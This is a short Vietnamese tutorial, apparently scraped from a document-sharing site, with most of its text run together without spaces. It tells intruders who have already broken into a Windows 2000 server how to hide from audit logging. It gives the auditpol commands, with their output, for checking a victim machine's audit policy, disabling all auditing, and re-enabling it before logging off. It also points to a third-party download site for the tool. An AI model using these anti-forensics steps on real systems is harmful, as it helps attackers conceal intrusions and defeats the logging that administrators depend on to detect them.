Bật ( tắt ) audit record bằng auditpol (for Server 2k)

Một trong các bước quan trọng của hacker khi đã thâm nhập được vào Server là tìm cách xóa dấu tích củamình trong Audit.
Nội dung trích xuất từ tài liệu:
Bật ( tắt ) audit record bằng auditpol (for Server 2k)Bật(tắt)auditrecordbằngauditpol(forServer2k)trangnàyđãđượcđọc lầnMộttrongcácbướcquantrọngcủahackerkhiđãthâmnhậpđượcvàoServerlàtìmcáchxóadấutíchcủamìnhtrongAuditRecord.(auditlàchứcnănglưulạitòanbộhànhđộngthâmnhậpvàthayđổicủahackervàoserver,chodùbạncóthâmnhậpthànhcônghaykhông).Cónhiềucáchđểxóalognày.Tôisẽchỉchocácbạn1cáchrấtđơngiảnvàhiệuquảlàdùngtoolauditpol.Auditpolkhôngxóafilelog(trongnhiềutrườnghợpxóafilelogkhôngphảlàgiảipháptốtđểxâmnhậplâudài),mànóchỉdisablechứcnăngaudit.Bạncũngcóthểenablechứcnăngnàysaukhirútlui(logoff).Cáchdùngauditpolrấtdễ.Trướctiênbạnthửkiểmtraxemmáyvictimcóbậtchếđộauditkhông(auditpolchạytrongmôitrườngDOS):C:auditpolIP_victimRunning...(X)AuditEnabledAuditCategorySystem=SuccessandFailureAuditCategoryLogon=SuccessandFailureAuditCategoryObjectAccess=SuccessandFailureAuditCategoryPrivilegeUse=SuccessandFailureAuditCategoryDetailedTracking=SuccessandFailureAuditCategoryPolicyChange=SuccessandFailureAuditCategoryAccountManagement=SuccessandFailureUnknown=SuccessandFailureUnknown=SuccessandFailureNósẽhiệnratấtcảcácchứcnăngcủaauditvàtìnhtrạnghiệnthờicủacácchứcnăngđó(đangbậthaytắt)Cáimàbạncầnlưutâmnhấtlàdòngthôngbáođầutiên(X)AuditEnabled.Nhưvậyaudittrênmáyvictimđanghọatđộng.Tachỉcầntắtauditbằnglệnh:C:auditpolIP_victim/disableRunning...AuditinformationchangedsuccessfullyonIP_victim...NewauditpolicyonIP_victim...(0)AuditDisabledAuditCategorySystem=NoAuditCategoryLogon=NoAuditCategoryObjectAccess=NoAuditCategoryPrivilegeUse=NoAuditCategoryDetailedTracking=NoAuditCategoryPolicyChange=NoAuditCategoryAccountManagement=NoUnknown=NoUnknown=NoBâygiờthìbạnyêntâmtunghòanhtrongmáyvictimmàkhôngsợbịtheodõi...:)Trướckhilogoffbạncũngđừngquêntrảlạitrạngtháibanđầuchoauditnhé.BạndùnglệnhC:auditpolIP_victim/enableBạncóthểdownloadauditpoltạiwww.download.tungxeng.net.ms